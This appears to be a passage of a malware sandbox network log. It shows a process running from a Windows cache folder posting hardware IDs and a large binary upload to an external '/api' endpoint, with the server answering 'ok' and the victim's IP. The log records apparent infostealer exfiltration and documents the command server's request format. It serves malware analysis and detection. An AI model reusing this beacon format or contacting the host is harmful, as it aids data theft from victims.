                                                                              2024-12-28 20:36:00 UTC8750OUTData Raw: 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58
                                                                              Data Ascii: --WUB58VWQQVKXContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--WUB58VWQQVKXContent-Disposition: form-data; name="pid"2--WUB58VWQQVKXContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--WUB58VWQQVKX
                                                                              2024-12-28 20:36:00 UTC1135INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:36:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e51pbad6ic1510f43mldq52779; expires=Wed, 23 Apr 2025 14:22:39 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpmqgqwFwQsjhoavmC%2BtbIMXRABF1SmiGtsyydeG%2F9ZxnfnndH%2FvMw6sDJ7pwP61dmayqpXN%2F3zeeomY7XB1x21CPd8RnNkeQ8LhZmf%2F2UIHnwgeDgkBHmjLxf4o0kTWLtSJ8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f94570d0eab440d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1633&rtt_var=613&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9684&delivery_rate=1788120&cwnd=177&unsent_bytes=0&cid=a37bab8a0bec7ff3&ts=877&x=0"
                                                                              2024-12-28 20:36:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-28 20:36:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449753104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:36:02 UTC284OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=B9W5VFRBJ5VK1I4ECJK
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20445
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:36:02 UTC15331OUTData Raw: 2d 2d 42 39 57 35 56 46 52 42 4a 35 56 4b 31 49 34 45 43 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 42 39 57 35 56 46 52 42 4a 35 56 4b 31 49 34 45 43 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 39 57 35 56 46 52 42 4a 35 56 4b 31 49 34 45 43 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c
                                                                              Data Ascii: --B9W5VFRBJ5VK1I4ECJKContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--B9W5VFRBJ5VK1I4ECJKContent-Disposition: form-data; name="pid"3--B9W5VFRBJ5VK1I4ECJKContent-Disposition: form-data; name="lid"MeHdy4--pl
                                                                              2024-12-28 20:36:02 UTC5114OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06
                                                                              Data Ascii: `M?lrQMn 64F6(X&7~
                                                                              2024-12-28 20:36:03 UTC1145INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:36:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=t4q9638vme9obupgjfenl8riec; expires=Wed, 23 Apr 2025 14:22:41 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxeBKPsVgn%2BrZjTC2NdwZ2D28oyuPKm9M7nZe0ol%2FAKbH88J6fnfwfGCm7cnQ%2Bo0y%2FI%2BNvVKjzl0LQJG3yucoCMU7F52qFVMoxe%2BpkTgpfLON8gZy92%2Bn4%2BQ3%2FHQjkoB79asTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f94571aecc78c77-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1855&min_rtt=1839&rtt_var=723&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21409&delivery_rate=1479979&cwnd=244&unsent_bytes=0&cid=60fc66e29968a78c&ts=992&x=0"
                                                                              2024-12-28 20:36:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-28 20:36:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449759104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:36:04 UTC282OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=A34H4KFN0QJ82PVOT8
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1226
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:36:04 UTC1226OUTData Raw: 2d 2d 41 33 34 48 34 4b 46 4e 30 51 4a 38 32 50 56 4f 54 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 41 33 34 48 34 4b 46 4e 30 51 4a 38 32 50 56 4f 54 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 33 34 48 34 4b 46 4e 30 51 4a 38 32 50 56 4f 54 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65
                                                                              Data Ascii: --A34H4KFN0QJ82PVOT8Content-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--A34H4KFN0QJ82PVOT8Content-Disposition: form-data; name="pid"1--A34H4KFN0QJ82PVOT8Content-Disposition: form-data; name="lid"MeHdy4--pl1ne
                                                                              2024-12-28 20:36:05 UTC1134INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:36:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=m6nq9c0466ck0j0947ls8cv4fb; expires=Wed, 23 Apr 2025 14:22:44 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rd182BdkxgQz%2BjC4%2FzlvrqCBXZPURxCgI7q8AVtH3Ft6T0CuYGyFx5cPqxiPyFl15QPhJTTvzyfMJ%2B87RZxoeaKxRgVIIz1Ois%2Fa1QW1YtL43%2Bl3Gy2b4FEboSYv6v40C3AOTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f94572a9ed67cf9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2011&rtt_var=759&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2144&delivery_rate=1452013&cwnd=211&unsent_bytes=0&cid=4e15efd4e9fd0a4c&ts=825&x=0"
                                                                              2024-12-28 20:36:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-28 20:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449765104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:36:07 UTC285OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=Z0LWSW34GXQ8HPHCEWP
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 554711
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: 2d 2d 5a 30 4c 57 53 57 33 34 47 58 51 38 48 50 48 43 45 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 5a 30 4c 57 53 57 33 34 47 58 51 38 48 50 48 43 45 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 30 4c 57 53 57 33 34 47 58 51 38 48 50 48 43 45 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c
                                                                              Data Ascii: --Z0LWSW34GXQ8HPHCEWPContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--Z0LWSW34GXQ8HPHCEWPContent-Disposition: form-data; name="pid"1--Z0LWSW34GXQ8HPHCEWPContent-Disposition: form-data; name="lid"MeHdy4--pl
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: 94 a6 09 83 79 9a 8a f0 86 d0 fc 97 ce e3 da ff 56 f6 8c e0 4e e0 64 2d 2b 9e a1 0c d3 3d 4e a5 6a a5 f8 41 52 1b 3f 75 1d 63 e2 44 f7 b2 8d 1f 98 7c 0a 1c 0f a7 2a df 3f 8f 80 7a 43 94 86 c2 77 e3 86 01 4f 72 4c ac ff cf 65 84 7d 15 40 13 97 73 b3 2d fe 32 60 fb 24 1f 9d c6 56 10 33 5d a0 7b 1a 0b c4 ae a8 c3 4a f9 84 e4 10 df 82 b3 ce 82 02 01 d2 c4 f5 1b e3 27 e2 04 68 f3 c5 ea 53 f1 77 c2 ed 36 22 02 8e 85 ed 65 18 fd 21 64 eb ec 7c 10 65 1c 84 d7 07 25 1d 41 fe 93 79 10 9c 0d 55 4a e1 8f 34 c3 85 fb 81 83 56 27 20 57 f3 bc 05 91 ea 1b 97 16 05 6e fc db f2 71 c0 a5 6f ac ef 5d da 88 fd 90 d3 3b 74 a8 66 fd c6 55 2a 54 60 5f d1 61 52 72 35 31 c4 75 32 2d 0a 05 f7 ee f7 11 31 c2 84 22 d3 4e 0c 4d cb c1 80 24 ff 78 6a 2e 28 0e 76 74 59 73 68 d0 c0 4f 07
                                                                              Data Ascii: yVNd-+=NjAR?ucD|*?zCwOrLe}@s-2`$V3]{J'hSw6"e!d|e%AyUJ4V' Wnqo];tfU*T`_aRr51u2-1"NM$xj.(vtYshO
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: 1f 98 90 0d 15 7c 93 bf 38 a6 1f c5 04 d9 76 73 30 61 95 ad 61 ee bc 97 73 9a a5 90 f2 91 23 f9 62 98 f7 98 66 e9 90 81 3c 1f 2b 39 a9 4b 4b ad 13 29 f5 12 5d 98 5a 2d 85 b7 ad c1 f8 80 e1 5a aa 09 f7 fb c7 f1 b8 b2 d1 c9 e9 e9 e8 3a fd 09 25 67 15 b0 d3 31 02 22 c8 ed c3 53 2d 03 89 2a 4a 8a 11 71 bf de 9f 38 26 1f 69 e0 d4 65 88 f3 3b ae c2 e7 c7 cb 57 eb ea e0 1e 35 96 fd 7a 97 41 e0 bf ab 66 3d 2d f0 aa 84 87 47 f3 f3 88 c7 a2 f9 85 d6 94 fa 96 84 76 36 c9 69 bf da a8 7d 14 47 90 43 09 ed c1 99 3c d4 5d 12 af 54 79 25 98 da 72 27 b4 76 4f fe a4 5c 3f ff 77 f5 ac c9 2b a3 bf cf 46 5f 4d 0f d9 c7 77 37 48 b4 8f da 6c f8 bc 31 1a f6 17 ff a5 58 3b 15 c2 8f fe c9 ec 5e 77 ba e2 f7 28 d3 10 d1 99 25 9a 95 db 22 2b b4 3e 1c 7b 6c 08 ea 8e da 12 79 ba a3 40
                                                                              Data Ascii: |8vs0aas#bf<+9KK)]Z-Z:%g1"S-*Jq8&ie;W5zAf=-Gv6i}GC<]Ty%r'vO\?w+F_Mw7Hl1X;^w(%"+>{ly@
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: a8 fc 90 c6 73 21 41 e2 c4 b4 48 0b 91 e1 8e eb dc 45 15 a0 73 3e b9 8a bb b5 81 5b ee 7b 75 ec f6 06 4a 1a d3 8c 5e de 7a 16 4b 15 63 97 dd dc 4d 8f b2 fe f4 6c ef 27 34 cc a8 5c 72 39 b0 f1 a2 5f a0 27 b3 e2 f3 48 4d c5 cb 7f 58 4c 6e 7e ec e9 ea a9 95 3f 4e 4c 6a f3 39 a1 ae b1 9f 5b bf a9 be c6 ee 36 af 38 d7 3e ed cf a4 e6 ed 05 8e c2 45 00 73 eb 34 70 bc b0 83 67 a7 4e af 6c a1 30 cb 6d 58 82 55 7a a0 8d c3 51 c7 87 db 7c 5d 7f 74 2f c2 6a 42 6e b2 40 1a c8 c6 84 dc f2 9a 87 e8 76 a1 f6 06 1f d4 f1 33 bd 6f c8 6d 26 4f c3 2d b4 80 c3 c7 5f 1b 88 8f 30 05 1e f2 ff df 11 e8 48 e6 28 04 ca d0 50 93 01 b8 56 96 8b 88 2c 89 48 cd 52 14 b8 10 f2 54 9b 6f 8d 2e ae 8a 7d f5 4a 71 48 eb 07 20 ec 21 3a 62 9e 61 89 5f 26 5d 3d b8 81 c5 4f 0c a3 54 50 20 f1 23
                                                                              Data Ascii: s!AHEs>[{uJ^zKcMl'4\r9_'HMXLn~?NLj9[68>Es4pgNl0mXUzQ|]t/jBn@v3om&O-_0H(PV,HRTo.}JqH !:ba_&]=OTP #
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: cc 32 4c a5 43 91 32 df 3f 44 62 b6 6c 04 b1 47 18 fc 1a 26 e5 26 fb 0c f7 0d e4 bc 2a 29 fb dc 3f 4d 94 83 28 4b 61 52 cf 38 e8 ff 45 85 cb f4 e5 79 2f 6d 7b 1a 61 9e 2f 23 5f bb 00 a6 12 e6 84 bc 9a df 63 c6 32 12 4d ed 89 ff 46 22 d0 d4 50 b1 3d d2 d8 79 94 27 da bc 1d 65 ee a4 f1 eb 32 fe a5 df d6 7b 10 dd 71 2e 80 d5 87 20 b1 8c 00 a6 6f 3a dd 66 cd cc ee 3c b9 7a 82 73 cd 00 8f 9f d2 0d fe 2a 19 88 e5 c1 08 63 7a 15 c6 d1 8c a8 a2 6e a3 39 d9 0f d6 8c 26 63 6c b8 50 a3 bc 95 7b a6 53 d2 e8 c8 f8 9d 99 a1 8a f8 cd 97 02 14 7e ce 9d d1 60 6c 3d a9 f6 3a 93 19 f1 f7 20 b9 4e 22 d2 b8 0e c1 0e 84 49 94 a3 2e 11 69 7d 68 46 5c b9 7a 3a 7c 8f 6f e9 29 9f 8a 64 b2 a5 7d 46 02 4e 48 70 3f a3 64 cf 2e 1d 2e e9 bb ac e9 8d 67 12 91 87 f9 4c aa 7e ac 34 69 dd
                                                                              Data Ascii: 2LC2?DblG&&*)?M(KaR8Ey/m{a/#_c2MF"P=y'e2{q. o:f<zs*czn9&clP{S~`l=: N"I.i}hF\z:|o)d}FNHp?d..gL~4i
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: 1e dd d2 71 bf 8c 7a 27 21 8e d4 f7 82 87 ad f3 e8 d9 a7 29 66 86 03 13 47 63 76 55 ff 7d bf 1b 43 4a 52 33 95 e3 7e 24 ea 06 93 e2 48 df 1e 46 3d 3f 2c 2b 0a 1c 9b e4 86 22 75 be 7e 5b b2 4c af e8 68 8a e7 5c 11 16 ff f1 37 b7 c3 15 7b 07 0e f2 87 4e 60 42 fd 51 3f 16 70 b1 59 75 26 34 f3 b0 89 10 09 ce fc 93 c0 4a 2f 56 82 ca b5 71 b0 ec 9b 5e 51 98 bd 5b 06 36 c4 c0 2f b9 d8 f5 51 a2 83 6d af ce 12 ab eb bb 25 6c 2f bc f0 e2 e9 ff 0e d3 5c cf c0 de e1 92 16 a1 bf 42 ec 44 55 99 48 2a 6c 33 56 2b ca b2 5b 57 ab 7d 86 32 d4 fd 30 ef f5 c1 fd d9 67 2e a0 6f ae 31 ce ec cc 14 b9 0a dd a4 aa 6b 2e a3 67 d1 cb 39 33 36 47 c9 74 d6 92 2a 6d 0c 80 b7 68 c6 3c ab 8f 94 26 02 08 7b c4 a2 94 b8 d9 0d db 6b 83 ff ae 4b 8e d4 30 3b a7 7e 26 c8 1d 77 86 f7 81 06 95
                                                                              Data Ascii: qz'!)fGcvU}CJR3~$HF=?,+"u~[Lh\7{N`BQ?pYu&4J/Vq^Q[6/Qm%l/\BDUH*l3V+[W}20g.o1k.g936Gt*mh<&{kK0;~&w
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: ad e7 20 30 72 c0 ea 15 61 79 e0 82 f7 1f cc 98 82 9b 2b 4b a1 96 3c 4a 1e c3 36 ff ef da b1 ff 39 6a 75 7a fb fc b7 1b d5 a4 74 65 c5 3f ed 22 8e 00 c3 a6 70 08 3b 8a 8b 9a 1c f1 d1 7a fe 71 2c de e5 4e e0 b7 23 8f 96 b6 32 bd 8c f7 89 6c 78 39 0a 28 54 f7 bc f4 c6 14 0d 5f c6 e1 11 df 7f a7 63 c7 8a 17 cc 49 fc 5f 37 db 11 75 40 da a9 ca e8 66 b6 79 aa ef 13 07 57 fe 49 dd 11 eb cc 83 28 12 84 09 a5 3d f6 c8 b1 f9 5a 08 cc 3e 0b 85 88 72 59 ca 90 a3 70 ef 49 8e d6 b9 34 ee bd 1e 74 4c 1f de e5 22 31 90 f7 7e a4 45 db a6 66 ad 68 96 87 5c c9 9a 66 e6 08 75 8a 86 bb 48 16 47 54 1f 01 16 a3 99 1a a8 ef d8 de bf b4 e1 8a 86 ab 38 48 ad 01 1b 7b 35 b2 1c b2 76 b4 97 00 3c 35 4e 10 71 28 04 cf 2a 76 ce ce 12 99 64 1d 1e fc 7e 85 52 b9 eb b6 12 73 64 82 65 29
                                                                              Data Ascii: 0ray+K<J69juzte?"p;zq,N#2lx9(T_cI_7u@fyWI(=Z>rYpI4tL"1~Efh\fuHGT8H{5v<5Nq(*vd~Rsde)
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: 1a 61 df c7 2c 2b 81 09 5d 0d 41 37 69 58 47 5d 4d 8b 2b 67 27 91 8f 96 36 57 f4 b6 3e d9 aa 7d f3 cb 82 90 92 20 63 c5 36 e2 d1 c1 e1 fc 45 03 9b de ec e2 8e 76 74 db 1f 43 c1 20 f0 08 ca 70 d8 5b 7a a9 58 2e 65 c4 e5 d4 a6 34 c2 73 d9 39 d3 b8 09 7d 0a 11 1a 89 f5 42 aa 53 57 b3 53 77 bd c1 00 97 f3 eb 72 ac 78 67 bc 7c f0 77 5f 58 1b 5f 9c f4 cd 77 28 ff da 54 06 4b 6f c7 5e 16 91 d1 84 6e 92 55 44 30 15 7b 0d 12 36 aa 38 84 7b 39 a6 fb fb 47 a2 28 0a a3 b7 56 c9 95 c7 39 7a f5 d5 dc 94 7f 40 8f 22 a4 61 74 4c 6b a5 7a d9 c3 da 12 27 26 32 ac 3e 25 84 73 fb f8 93 0b ac 4a 07 a7 8e e4 1e 09 4d 3e 72 f2 fc bf d3 66 2c d2 ba e8 0e 3b a2 e4 1b 5b 6c db ac 5c d4 4a cf 69 28 23 db 27 71 e7 c5 a5 69 c3 d1 4f 76 d0 67 9e 27 f0 59 2c 98 17 ee 4b 3f 07 b4 16 0e
                                                                              Data Ascii: a,+]A7iXG]M+g'6W>} c6EvtC p[zX.e4s9}BSWSwrxg|w_X_w(TKo^nUD0{68{9G(V9z@"atLkz'&2>%sJM>rf,;[l\Ji(#'qiOvg'Y,K?
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: 72 e9 04 c7 c9 5f cb 9c 7d ad cd c2 60 91 8d b0 02 03 0f f1 25 d9 d9 34 1d 1c d9 24 b6 ff ff 3f 31 e1 0c e0 b4 1d fd 80 2c ee 1c 6a 97 21 aa 43 3f f2 c7 3b df ad cb da f2 13 d5 e6 04 4d 01 20 81 95 4a 75 cf 53 23 2c e8 e9 19 a1 8f de 6d d0 1f 3a 31 e0 9b fe a4 b5 fb f3 c3 7c 33 41 de ad 79 fb 4f 46 d4 ff dd 12 13 04 21 3e 8b 8b 68 a0 8d bf 82 03 6f d1 85 02 a8 61 32 59 f2 9f e0 34 6d 9f c4 cd 63 35 96 c6 fc be 3a 08 06 0c 38 41 ce 91 a5 f6 a2 e8 01 0e 85 4a c3 5c c9 c3 fd 52 23 ae f1 d8 11 55 ba 00 46 9b e5 19 4d 0d 06 f8 f5 c7 ac b1 15 c0 a7 62 3e 78 5c e4 cd 56 dc be 69 2b 34 af 9d 0f 9f 99 33 55 73 e2 d4 e6 b3 8a 54 63 5e c1 31 f1 7b 10 6c d4 ad bf 7e c5 41 02 75 3d 61 02 02 37 08 b8 06 5c bd 72 54 c8 6e 2a 3f 80 70 d0 0a 71 6f e8 4e ae 5d 6b ce 2c d9
                                                                              Data Ascii: r_}`%4$?1,j!C?;M JuS#,m:1|3AyOF!>hoa2Y4mc5:8AJ\R#UFMb>x\Vi+43UsTc^1{l~Au=a7\rTn*?pqoN]k,
                                                                              2024-12-28 20:36:07 UTC15331OUTData Raw: a1 11 d5 cd 3d e3 98 73 3b 9c dc 88 92 4b 4d f1 16 d1 88 b7 b0 78 a6 a5 70 25 59 84 b4 6b fd a6 91 f6 9a 83 7a 26 5f a4 f3 c8 c9 08 fa cb 9b 92 13 a6 96 9f a2 f9 37 f8 7c 08 e8 da eb 68 c2 19 fe 6b 92 82 8e f3 fa 34 81 af f6 ff f7 d2 1b eb 38 bd 93 99 10 1f 93 58 b6 d3 90 97 79 57 cd 4b 10 f1 c6 2c 7a ac 31 11 30 ec 8e 82 fc c3 33 2a 50 fe 2f 33 a6 bb c3 f0 c5 ab 5f 44 2b 77 de 2c 66 6b 20 20 f2 8b 6b ea 69 6f d6 d5 fc 70 46 42 fe 52 cd 84 cb 14 3c 51 db 44 aa 40 ab 0b 58 b6 ee 08 3d 0a c3 30 35 28 46 ad d0 14 e7 ed 7e 7d b9 48 25 65 02 c0 4e 8e de 71 fe c6 90 ef ec 40 4f 0f e9 03 ae f3 07 46 6b c2 7b 6e 0b 38 06 2d bc 9a b7 57 21 b6 d0 b3 3c 06 2b e5 06 4b ee ba e4 8b 2d 0c 84 49 45 7a 37 2b 77 8c 2d 15 6b d3 a3 a8 75 b3 1e 79 21 08 f7 02 c6 fe 5c 1f 7b
                                                                              Data Ascii: =s;KMxp%Ykz&_7|hk48XyWK,z103*P/3_D+w,fk kiopFBR<QD@X=05(F~}H%eNq@OFk{n8-W!<+K-IEz7+w-kuy!\{
                                                                              2024-12-28 20:36:09 UTC1135INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:36:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9o647lv3a24bd4llkfibjqku5c; expires=Wed, 23 Apr 2025 14:22:48 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
